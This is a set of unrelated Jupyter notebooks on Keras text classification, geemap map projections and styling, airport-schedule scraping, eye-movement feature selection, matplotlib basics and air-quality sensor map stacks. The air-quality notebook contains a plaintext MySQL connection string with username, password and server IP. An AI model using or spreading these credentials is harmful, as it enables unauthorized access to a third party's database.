keras.callbacks.EarlyStopping(monitor='val_loss', patience=5) ``` ### We are ready to train the model and validate ``` model.fit(train_features, train_labels, epochs=15, batch_size=512, validation_data=(valid_features, valid_labels), callbacks=[es_cb], verbose=1) ``` ### How good is the model? ``` test['text'] = test['text'].apply(remove_digits) test_features = vectorizer.transform(test['text']) test_labels = le.transform(test['class']) results = model.evaluate(test_features, test_labels) print("Accuracy: {0:.2f}%".format(results[1]*100.)) ``` ### Combining the training and validation sets and retraining the model ``` data = pd.concat((train, validation), axis=0) vectorizer = CountVectorizer(stop_words=None, lowercase=True, ngram_range=(1, 1), min_df=2) features = vectorizer.fit_transform(data['text']) labels = le.fit_transform(data['class']) test_features = vectorizer.transform(test['text']) test_labels = le.transform(test['class']) model = keras.Sequential() model.add(Dropout(rate=0.2, input_shape=features.shape[1:])) model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=1, activation='sigmoid')) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) model.fit(features, labels, epochs=15, batch_size=512, validation_data=(test_features, test_labels), callbacks=[es_cb], verbose=1) ``` > We will use this model for serving. ### Creating `sklearn` pipeline for deployment For this we will have to wrap the `tf-keras` model into a `scikit-learn` compatible model class. Then we can use that as a part of a `scikit-learn` pipeline. Let's start by defining a `create_model()` method which would be required for the _scikit-learn model wrapping_ part. 
``` # Defined this method in a separate .py file # to resolve Runtime errors from ModelCreate import create_model from keras.wrappers.scikit_learn import KerasClassifier # Same epoch and same batch size model = KerasClassifier(build_fn=create_model, epochs=15, batch_size=512, verbose=0) # Construct the pipeline from sklearn.pipeline import Pipeline pipeline = Pipeline([('feature_transformer', vectorizer), ('classifier', model)]) # Fit the pipeline pipeline.fit(data['text'], labels) # Use the pipeline to make inferences le.inverse_transform(pipeline.predict([remove_digits('I had a very bad experience you know.')])) # Ready to serialize/pickle the model from sklearn.externals import joblib # Courtesy: https://bit.ly/2IwQKSS # Save the Keras model first pipeline.named_steps['classifier'].model.save('model/keras_model.h5') # This hack allows us to save the sklearn pipeline pipeline.named_steps['classifier'].model = None # Finally, save the pipeline joblib.dump(pipeline, 'model/sklearn_pipeline.pkl') # Load the pipeline first pipeline = joblib.load('model/sklearn_pipeline.pkl') # Then, load the Keras model from keras.models import load_model from keras.utils import CustomObjectScope from keras.initializers import glorot_uniform with CustomObjectScope({'GlorotUniform': glorot_uniform()}): pipeline.named_steps['classifier'].model = load_model('model/keras_model.h5') # Start making inference le.inverse_transform(pipeline.predict([remove_digits('I had a very bad experience you know.')]))[0] ```
github_jupyter
<a href="https://githubtocolab.com/giswqs/geemap/blob/master/examples/notebooks/51_cartoee_projections.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab"/></a> Uncomment the following line to install [geemap](https://geemap.org) and [cartopy](https://scitools.org.uk/cartopy/docs/latest/installing.html#installing) if needed. Keep in mind that cartopy can be challenging to install. If you are unable to install cartopy on your computer, you can try Google Colab with this the [notebook example](https://colab.research.google.com/github/giswqs/geemap/blob/master/examples/notebooks/cartoee_colab.ipynb). See below the commands to install cartopy and geemap using conda/mamba: ``` conda create -n carto python=3.8 conda activate carto conda install mamba -c conda-forge mamba install cartopy scipy -c conda-forge mamba install geemap -c conda-forge jupyter notebook ``` ``` # !pip install cartopy scipy # !pip install geemap ``` # Working with projections in cartoee `cartoee` is a lightweight module to aid in creatig publication quality maps from Earth Engine processing results without having to download data. The `cartoee` package does this by requesting png images from EE results (which are usually good enough for visualization) and `cartopy` is used to create the plots. Utility functions are available to create plot aethetics such as gridlines or color bars. **The notebook and the geemap cartoee module ([cartoee.py](https://geemap.org/cartoee)) were contributed by [Kel Markert](https://github.com/KMarkert). A huge thank you to him.** ``` import ee import geemap from geemap import cartoee import cartopy.crs as ccrs %pylab inline geemap.ee_initialize() ``` ## Plotting an image on a map Here we are going to show another example of creating a map with EE results. We will use global sea surface temperature data for Jan-Mar 2018. 
``` # get an earth engine image of ocean data for Jan-Mar 2018 ocean = ( ee.ImageCollection('NASA/OCEANDATA/MODIS-Terra/L3SMI') .filter(ee.Filter.date('2018-01-01', '2018-03-01')) .median() .select(["sst"], ["SST"]) ) # set parameters for plotting # will plot the Sea Surface Temp with specific range and colormap visualization = {'bands':"SST", 'min':-2, 'max':30} # specify region to focus on bbox = [-180, -88, 180, 88] fig = plt.figure(figsize=(15,10)) # plot the result with cartoee using a PlateCarre projection (default) ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=bbox) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.set_title(label = 'Sea Surface Temperature', fontsize = 15) ax.coastlines() plt.show() ``` ### Mapping with different projections You can specify what ever projection is available within `cartopy` to display the results from Earth Engine. Here are a couple examples of global and regions maps using the sea surface temperature example. Please refer to the [`cartopy` projection documentation](https://scitools.org.uk/cartopy/docs/latest/crs/projections.html) for more examples with different projections. 
``` fig = plt.figure(figsize=(15,10)) # create a new Mollweide projection centered on the Pacific projection = ccrs.Mollweide(central_longitude=-180) # plot the result with cartoee using the Mollweide projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax,vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Mollweide projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new Goode homolosine projection centered on the Pacific projection = ccrs.Robinson(central_longitude=-180) # plot the result with cartoee using the Goode homolosine projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Robinson projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new Goode homolosine projection centered on the Pacific projection = ccrs.InterruptedGoodeHomolosine(central_longitude=-180) # plot the result with cartoee using the Goode homolosine projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Goode homolosine projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new orographic projection focused on the Pacific projection = ccrs.EqualEarth(central_longitude=-180) # plot the result with cartoee using the orographic projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma', orientation='vertical') ax.set_title("Equal Earth projection") ax.coastlines() plt.show() fig = 
plt.figure(figsize=(15,10)) # create a new orographic projection focused on the Pacific projection = ccrs.Orthographic(-130,-10) # plot the result with cartoee using the orographic projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma', orientation='vertical') ax.set_title("Orographic projection") ax.coastlines() plt.show() ``` ### Warping artifacts Often times global projections are not needed so we use specific projection for the map that provides the best view for the geographic region of interest. When we use these, sometimes image warping effects occur. This is because `cartoee` only requests data for region of interest and when mapping with `cartopy` the pixels get warped to fit the view extent as best as possible. Consider the following example where we want to map SST over the south pole: ``` fig = plt.figure(figsize=(15, 10)) # Create a new region to focus on spole = [-180, -88, 180,0] projection = ccrs.SouthPolarStereo() # plot the result with cartoee focusing on the south pole ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=spole, proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.coastlines() ax.set_title('The South Pole') plt.show() ``` As you can see from the result there are warping effects on the plotted image. There is really no way of getting aound this (other than requesting a larger extent of data which may not always be the case). 
So, what we can do is set the extent of the map to a more realistic view after plotting the image as in the following example: ``` fig = plt.figure(figsize=(15,10)) # plot the result with cartoee focusing on the south pole ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=spole, proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.coastlines() ax.set_title('The South Pole') # get bounding box coordinates of a zoom area zoom = spole zoom[-1] = -20 # convert bbox coordinate from [W,S,E,N] to [W,E,S,N] as matplotlib expects zoom_extent = cartoee.bbox_to_extent(zoom) # set the extent of the map to the zoom area ax.set_extent(zoom_extent,ccrs.PlateCarree()) plt.show() ```
github_jupyter
``` import pandas as pd, json, numpy as np import matplotlib.pyplot as plt %matplotlib inline ``` Load airports of each country ``` L=json.loads(file('../json/L.json','r').read()) M=json.loads(file('../json/M.json','r').read()) N=json.loads(file('../json/N.json','r').read()) import requests AP={} for c in M: if c not in AP:AP[c]={} for i in range(len(L[c])): AP[c][N[c][i]]=L[c][i] sch={} ``` record schedules for 2 weeks, then augment count with weekly flight numbers. seasonal and seasonal charter will count as once per week for 3 months, so 12/52 per week. TGM separate, since its history is in the past. ``` baseurl='https://www.airportia.com/' import requests, urllib2 SC={} ``` parse Arrivals ``` for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'arrivals/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SC[c]=sch ``` parse Departures ``` SD={} for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'departures/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html 
m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SD[c]=sch SC ``` for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'arrivals/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SC[c]=sch ``` mdf=pd.DataFrame() for i in sch: for d in sch[i]: df=sch[i][d].drop(sch[i][d].columns[3:],axis=1).drop(sch[i][d].columns[0],axis=1) df['To']=i df['Date']=d mdf=pd.concat([mdf,df]) mdf=mdf.replace('Hahn','Frankfurt') mdf=mdf.replace('Hahn HHN','Frankfurt HHN') mdf['City']=[i[:i.rfind(' ')] for i in mdf['From']] mdf['Airport']=[i[i.rfind(' ')+1:] for i in mdf['From']] file("mdf_ae_arrv.json",'w').write(json.dumps(mdf.reset_index().to_json())) len(mdf) airlines=set(mdf['Airline']) cities=set(mdf['City']) file("cities_ae_arrv.json",'w').write(json.dumps(list(cities))) file("airlines_ae_arrv.json",'w').write(json.dumps(list(airlines))) citycoords={} for i in cities: if i not in citycoords: if i==u'Birmingham': z='Birmingham, UK' elif i==u'Valencia': z='Valencia, Spain' elif i==u'Naples': z='Naples, Italy' elif i==u'St. Petersburg': z='St. 
Petersburg, Russia' elif i==u'Bristol': z='Bristol, UK' elif i==u'Victoria': z='Victoria, Seychelles' elif i==u'Washington': z='Washington, DC' elif i==u'Odessa': z='Odessa, Ukraine' else: z=i citycoords[i]=Geocoder(apik).geocode(z) print i citysave={} for i in citycoords: citysave[i]={"coords":citycoords[i][0].coordinates, "country":citycoords[i][0].country} file("citysave_ae_arrv.json",'w').write(json.dumps(citysave)) ```
github_jupyter
[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/giswqs/GEE-Courses/blob/master/docs/gee_intro/Image/image_styling.ipynb) ``` # !pip install geemap import ee import geemap import geemap.colormaps as cm ``` ## Colormap ``` # geemap.update_package() cm.palettes.dem cm.palettes.ndvi cm.palettes.ndwi cm.get_palette('terrain', n_class=8) cm.plot_colormap('terrain', width=8.0, height=0.4, orientation='horizontal') cm.list_colormaps() cm.plot_colormaps(width=12, height=0.4) ``` ## Colorbar ``` Map = geemap.Map() palette = cm.palettes.dem # palette = cm.palettes.terrain dem = ee.Image('USGS/SRTMGL1_003') vis_params = {'min': 0, 'max': 4000, 'palette': palette} Map.addLayer(dem, vis_params, 'SRTM DEM') Map.add_colorbar(vis_params, label="Elevation (m)", layer_name="SRTM DEM") Map Map.add_colorbar( vis_params, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM" ) Map.add_colorbar( vis_params, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM", transparent_bg=True, ) Map.add_colorbar( vis_params, discrete=True, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM", ) ``` ## Legend ``` legends = geemap.builtin_legends for legend in legends: print(legend) Map = geemap.Map(basemap="HYBRID") Map.add_basemap("FWS NWI Wetlands Raster") Map.add_legend(builtin_legend="NWI") Map Map = geemap.Map(basemap="HYBRID") Map.add_basemap("NLCD 2016 CONUS Land Cover") Map.add_legend(builtin_legend="NLCD") Map Map = geemap.Map() legend_dict = { '11 Open Water': '466b9f', '12 Perennial Ice/Snow': 'd1def8', '21 Developed, Open Space': 'dec5c5', '22 Developed, Low Intensity': 'd99282', '23 Developed, Medium Intensity': 'eb0000', '24 Developed High Intensity': 'ab0000', '31 Barren Land (Rock/Sand/Clay)': 'b3ac9f', '41 Deciduous Forest': '68ab5f', '42 Evergreen Forest': '1c5f2c', '43 Mixed Forest': 'b5c58f', '51 Dwarf Scrub': 'af963c', '52 Shrub/Scrub': 'ccb879', '71 
Grassland/Herbaceous': 'dfdfc2', '72 Sedge/Herbaceous': 'd1d182', '73 Lichens': 'a3cc51', '74 Moss': '82ba9e', '81 Pasture/Hay': 'dcd939', '82 Cultivated Crops': 'ab6c28', '90 Woody Wetlands': 'b8d9eb', '95 Emergent Herbaceous Wetlands': '6c9fb8', } landcover = ee.Image('USGS/NLCD/NLCD2016').select('landcover') Map.addLayer(landcover, {}, 'NLCD Land Cover') Map.add_legend( title="NLCD Land Cover Classification", legend_dict=legend_dict, layer_name='NLCD Land Cover', ) Map ```
github_jupyter
``` import numpy as np import pandas as pd from sklearn.feature_selection import RFE from sklearn.tree import DecisionTreeClassifier import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv("eye_movements.csv") num_missing_values = df.isna().sum() num_missing_values # No need to remove any tuples or perform data imputation since none of the data is missing attributes = df.columns attributes num_unique = {} for attribute in attributes: num_unique[attribute] = len(pd.unique(df[attribute])) num_unique df2 = df.drop(columns=['lineNo','titleNo','wordNo'], axis=1) # Contains unique values for each instance, not going to be useful # Also contants index values instead of actual data df2.columns x = df2.drop(columns=['label'], axis=1) y = df2['label'] # get the pearson correlation coefficients for all features to determine which features to train on corr = df2.corr() class_correlation = abs(corr["label"]) relevant_features = class_correlation[class_correlation > 0.1] relevant_features # features should be independent of each other, test to make sure they aren't highly correlated with each other feature_strings = ["P2stFixation", "totalFixDur", "nRegressFrom", "regressDur", "nextWordRegress", "pupilDiamMax", "timePrtctg"] for i in feature_strings: for j in feature_strings: if i != j: print(abs(df[[i,j]].corr())) print() # drop all columns which have a low correlation # regressDur and timePtrctg have a high correlation with several other attributes and are thus not independent, drop both as well final_columns = ["P2stFixation", "totalFixDur", "nRegressFrom", "nextWordRegress", "pupilDiamMax"] df_preprocessed_correlation = df2 for i in df2.columns: if i not in final_columns: df_preprocessed_correlation = df_preprocessed_correlation.drop(columns=[i,], axis=1) df_preprocessed_correlation # perform attribute selection with RFE + decision trees # RFE (Recursive Feature Elimination) feeds the data to a model, evaluates the performance for each attribute # and deletes 
attributes which don't perform well enough rfe = RFE(estimator=DecisionTreeClassifier(), n_features_to_select=5) fit = rfe.fit(x, y) best_features = [] print(len(fit.support_)) print(len(x.columns)) for i in range(len(fit.support_)): if fit.support_[i]: best_features.append(x.columns[i]) print(best_features) df_preprocessed_rfe = df2 for i in df2.columns: if i not in best_features: df_preprocessed_rfe = df_preprocessed_rfe.drop(columns=[i,], axis=1) df_preprocessed_rfe ```
github_jupyter
``` from matplotlib import pyplot as plt import numpy as np import random as rn import csv import urllib import matplotlib.dates as mdates # Video 1 - Introduction and Line plt.plot([1, 2, 3], [5, 7, 4]) plt.show() # Video 2 - Legends, titles and labels x1 = [1, 2, 3] y1 = [5, 7, 4] x2 = [1, 2, 3] y2 = [10, 14, 12] plt.plot(x1, y1, label = 'First line') plt.plot(x2, y2, label = 'Second line') plt.xlabel('X Axis here') plt.ylabel('Y Axis here') plt.title('Title here!\nSubtitle here!') plt.legend() plt.show() # Video 3 - Barcharts and Histograms # x1 = [2, 4, 6, 8, 10] # y1 = [6, 7, 8, 2, 4] # x2 = [1, 3, 5, 7, 9] # y2 = [7, 8, 2, 4, 2] # plt.bar(x1, y1, label = 'Bars1', color = 'green') # plt.bar(x2, y2, label = 'Bars2', color = 'red') population_ages = [22, 55, 62, 45, 21, 22, 34, 42, 42, 4, 99, 102, 110, 120, 121, 122, 130, 111, 115, 112, 80, 75, 65, 54, 44, 43, 42, 48] # ids = [x for x in range(len(population_ages))] bins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130] plt.hist(population_ages, bins = bins, histtype = 'bar', rwidth = 0.8, label ='Ages') plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Video 4 - Scatter plots x = [x for x in range(8)] y = [rn.randint(0, 10) for x in range(8)] plt.scatter(x, y, label = 'skitscat', color = 'b', marker = '*', s = 100) plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Video 5 - Pie plots days = [x for x in range(5)] sleeping = [7, 8, 6, 11, 7] eating = [2, 3, 4, 3, 2] playing = [7, 8, 7, 2, 2] coding = [5, 3, 8, 6, 7] slices = [7,2,2,13] activities = ['sleeping','eating','working','playing'] cols = ['c','m','r','b'] plt.pie(slices, labels = activities, colors = cols, startangle = 90, shadow = True, explode = (0, 0.1, 0, 0), autopct = '%1.1f' ) # plt.xlabel('x') # plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') # plt.legend() plt.show() # Video 6 - Loading data from file # 
x = [] # y = [] # with open('data.txt', 'r') as csv_file: # plots = csv.reader(csv_file, delimiter = ',') # for row in plots: # x.append(int(row[0])) # y.append(int(row[1])) x, y = np.loadtxt('data.txt', delimiter = ',', unpack = True) plt.plot(x, y, label ='Loaded from file', color = 'g') plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Day 7 - Getting Data from Internet def load_data(): global source_code stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() def graph_data(): stock_data = [] split_sources = source_code.split('\n') for i in range(1, len(split_sources)): stock_data.append(split_sources[i].split(',')) # date, closep, highp, lowp, openp, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y%m%d')}) # plt.xlabel("x") # plt.ylabel("y") # plt.title('Data Visualization Course\nBy sentdex') # plt.legend() # plt.show() graph_data() # Day 8 - Coverting data from Internet def bytespdate2num(fmt, encoding='utf-8'): def bytesconverter(b): s = b.decode(encoding) return (mdates.datestr2num(s)) return bytesconverter def graph_data(stock): stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() stock_data = [] split_source = source_code.split('\n') for line in split_source[1:]: split_line = line.split(',') if len(split_line) == 7: if 'values' not in line and 'labels' not in line: stock_data.append(line) date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y-%m-%d')}) plt.plot_date(date, closep, '-', label = 'Price') plt.xlabel('Date') plt.ylabel('Price') plt.title('Interesting Graph\nCheck it out') plt.legend() plt.show() graph_data('TSLA') # Day 9 - Basic Customizations, Rotating labels def 
bytespdate2num(fmt, encoding='utf-8'): def bytesconverter(b): s = b.decode(encoding) return (mdates.datestr2num(s)) return bytesconverter def graph_data(stock): stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() stock_data = [] split_source = source_code.split('\n') for line in split_source[1:]: split_line = line.split(',') if len(split_line) == 7: if 'values' not in line and 'labels' not in line: stock_data.append(line) date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y-%m-%d')}) fig = plt.figure() plt.plot_date(date, closep, '-', label = 'Price') plt.xlabel('Date') plt.ylabel('Price') plt.title('Interesting Graph\nCheck it out') plt.legend() plt.show() graph_data('TSLA') ```
github_jupyter
``` import pandas as pd import numpy as np import pymysql from sqlalchemy import create_engine import matplotlib.pyplot as plt import os.path # set this to True to force download database using SQL, # else {if `datafile` exists, load it. else download from database} download = False datafile = 'data.csv' engine = None %%time if download or not os.path.isfile(datafile): if engine is None: print('Creating database engine...') engine = create_engine('mysql+pymysql://iotr:iotr123@115.88.201.51/kisti') print('Querying database...') df = pd.read_sql_query('SELECT * FROM sensorParser WHERE gateway_id="SERVER"\ AND timestamp IS NOT NULL AND timestamp <> "" ORDER BY timestamp LIMIT 1000000', engine) print('Saving "{}" to disk...'.format(datafile)) df.to_csv(datafile) else: print('Reading from "{}"...'.format(datafile)) df = pd.read_csv(datafile, header=0) df_temp = df df.head() df.info() ``` # Clean data ``` df = df.dropna(axis=0, how='any', subset=['temp_value']) df.shape df = df[df.temp_value > -10] df = df[df.temp_value < 60] df.shape df['timegroup'] = df['timestamp'].apply(lambda x: x.split(':')[0]) df.timegroup.head() df = df.iloc[3:] df.timegroup.head() df = df[df.lat < 36.0] df = df[df.lat > 35.5] df = df[df.lng < 129.0] df = df[df.lng > 128.2] df.shape df = df[df.co_value < 10] df.shape df = df[df.pm2_5_value < 200] df = df[df.pm10_value < 1000] df = df[df.pres_value < 200000] df.shape df.describe() df.columns feature_columns = ['temp_value', 'so2_value', 'no2_value', 'co_value', 'pm2_5_value', 'pm10_value', 'voc_value', 'hum_value', 'pres_value', 'mcp_value'] spatial_columns = ['lat', 'lng'] time_column = 'timegroup' all_columns = spatial_columns + feature_columns + [time_column] df[feature_columns] for col in feature_columns + spatial_columns: plt.figure() plt.title(col) df[col].plot.hist(alpha=0.5, bins=10) plt.show() ``` # Convert lat, long to row, column ``` min_corner, max_corner = df[spatial_columns].min(), df[spatial_columns].max() min_corner max_corner 
sample_point = df.iloc[0][spatial_columns] sample_point def get_region(x, minx, maxx, total_regions): region = (x - minx) / (maxx - minx) region *= total_regions region = int(region) # force lower bound and upper bound of the region region = max(0, region) region = min(total_regions-1, region) return region get_region(sample_point.lat, min_corner.lat, max_corner.lat, 10) n_rows = 10 n_cols = 10 def get_row(lat, lng, min_corner, max_corner, rows, cols): row = get_region(lat, min_corner.lat, max_corner.lat, rows) row = rows - row - 1 # invert latitude, to make it goes from bottom to top return row def get_col(lat, lng, min_corner, max_corner, rows, cols): col = get_region(lng, min_corner.lng, max_corner.lng, cols) return col def get_rc(lat, lng, min_corner, max_corner, rows, cols): row = get_row(lat, lng, min_corner, max_corner, rows, cols) col = get_col(lat, lng, min_corner, max_corner, rows, cols) return row, col get_rc(sample_point.lat, sample_point.lng, min_corner, max_corner, 10, 10) %%time rows = [] cols = [] for i in range(df.shape[0]): current_record = df.iloc[i] r,c = get_rc(current_record.lat, current_record.lng, min_corner, max_corner, n_rows, n_cols) rows.append(r) cols.append(c) rows[0], cols[0] #example row and col from lat,long df['row'] = rows df['col'] = cols df[['row', 'col']].head() ``` # Generate map stacks ``` ## defining map_stacks as a 4D tensor of shape (n_map_stack, n_rows, n_cols, n_channels) ## ready for feeding into a convolutional neural network grouped = df.groupby('timegroup') feature_columns2 = feature_columns + ['sensing_count', 'sensing_binary'] map_stacks = np.zeros([len(grouped), n_rows, n_cols, len(feature_columns2)]) group_no = 0 for name, group in grouped: slot_grouped = group.groupby(['row', 'col']) map_stack = np.zeros([n_rows, n_cols, len(feature_columns2)]) for name, slot_df in slot_grouped: sensing_count = slot_df.shape[0] sensing_binary = 1 if sensing_count > 0 else 0 map_stack[name[0], name[1], :] = 
list(slot_df[feature_columns].mean().values) + [sensing_count, sensing_binary] map_stacks[group_no, :, :, :] = map_stack group_no += 1 # print(map_stack[:,:,-1]) # print(map_stack[:,:,0]) # map_stack.shape map_stacks.shape # sensing count for each duration sensing_count = [] for i in range(map_stacks.shape[0]): sensing_count.append(map_stacks[i,:,:,-2].sum()) plt.hist(sensing_count) plt.show() def plot_map_stack(*map_stacks): for channel in range(map_stacks[0].shape[2]): fig, axes = plt.subplots(1, len(map_stacks)) for i in range(len(map_stacks)): ax = axes[i] if isinstance(axes, np.ndarray) else axes ax.imshow(map_stacks[i][:,:,channel], cmap='gray', interpolation='none') ax.set_title(feature_columns2[channel]) ax.grid(color='w', linestyle='-', linewidth=1) ax.set_xticks(np.arange(-0.5, n_cols+.5, 1)) ax.set_yticks(np.arange(-0.5, n_rows+.5, 1)) ax.set_xticklabels(np.arange(0, n_cols+1, 1)) ax.set_yticklabels(np.arange(0, n_rows+1, 1)) plt.show() # plot an example of a stack map map_stack = map_stacks[0, :, :, :] plot_map_stack(map_stack) ``` **Normalize maps** ``` from sklearn.preprocessing import StandardScaler scaler = StandardScaler() map_stacks2d = map_stacks.reshape([-1, map_stacks.shape[-1]]) map_stacks2d_scaled = scaler.fit_transform(map_stacks2d) scaled_map_stacks = map_stacks2d_scaled.reshape(map_stacks.shape) map_stacks2d_scaled.shape, scaled_map_stacks.shape # prepare input, output pairs for the model X = scaled_map_stacks[:-1, ...] y = scaled_map_stacks[1:, ...] # y -= X X.shape, y.shape ``` # Building the model ``` # train test split from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15) X_train.shape, X_test.shape from keras.models import Sequential from keras.layers import Dense, Conv2D, Conv2DTranspose from keras.callbacks import EarlyStopping layers = [ # this applies 32 convolution filters of size 3x3 each. 
Conv2D(32, (3, 3), activation='relu', input_shape=(n_rows, n_cols, map_stacks.shape[-1])), Conv2D(32, (3, 3), activation='relu'), # Conv2D(64, (3, 3), activation='relu'), # Conv2DTranspose(32, (3, 3), activation='relu'), Conv2DTranspose(32, (3, 3), activation='relu'), Conv2DTranspose(map_stacks.shape[-1], (3, 3), activation='linear'), ] model = Sequential(layers) model.compile(loss='mean_squared_error', optimizer='rmsprop') model.summary() # model.add(MaxPooling2D(pool_size=(2, 2))) # model.add(Dropout(0.25)) callbacks = [ EarlyStopping(monitor='val_loss', patience=5, verbose=1) ] history = model.fit(X_train, y_train, epochs=200, verbose=0, validation_split=0.1, batch_size=32, callbacks=callbacks) model.save('model.h5') history.history # # plot weights # weights = model.layers[0].get_weights()[0] # print(weights.shape) # for i in range(32): # plt.imshow(weights[:,:,0,i], cmap='gray', interpolation='none') # plt.show() model.evaluate(X_train, y_train, batch_size=32) model.evaluate(X_test, y_test, batch_size=32) y_dummy = np.random.random(size=y_test.shape) * y_test.std() + y_test.mean() model.evaluate(X_test, y_dummy, batch_size=32) from sklearn.metrics import r2_score r2_train = r2_score(y_train.ravel(), model.predict(X_train).ravel()) r2_test = r2_score(y_test.ravel(), model.predict(X_test).ravel()) r2_dummy = r2_score(y_test.ravel(), y_dummy.ravel()) r2_train, r2_test, r2_dummy # try plotting prediction vs actual output def plot_xy(x, y, idx): y_pred = model.predict(x[idx:idx+1,...]).squeeze() y_true = y[idx,...] plot_map_stack(x[idx,...], y_true, y_pred) # plot train plot_xy(X_train, y_train, 42) plot_xy(X_test, y_test, 42) ``` # Use map stack to predict something useful 0. train a new predictive model on all sensing records, with labels like good/bad, asthma/not-asthma, etc 1. given past sensing map stack, predict successive sensing map stack 2. feed each sensing slot of the successive map stack into the new predictive model 3. 
